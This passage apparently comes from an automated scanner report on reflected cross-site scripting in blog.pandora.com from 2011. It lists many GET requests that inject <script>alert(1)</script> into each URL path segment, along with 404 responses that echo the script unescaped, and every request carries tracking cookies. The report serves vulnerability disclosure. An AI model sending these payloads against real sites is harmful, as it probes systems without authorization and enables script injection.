Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)</script>370b7b6a4ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)</script>4fb98f6e6f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)</script>9a08076521d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)</script>62f82312779 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)</script>cbdd421d4ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)</script>c5395df2fbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)</script>1397d442dff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)</script>a841a197765 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)</script>6fc6995917b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)</script>cfaacaaf3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)</script>7c9340a2e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)</script>d624e770f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)</script>060e4b9ef4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)</script>ad8c655c453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)</script>57eed6c6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)</script>a51d01b1831 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)</script>bac3aa178c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)</script>9916758d92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)</script>20072b4f4e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
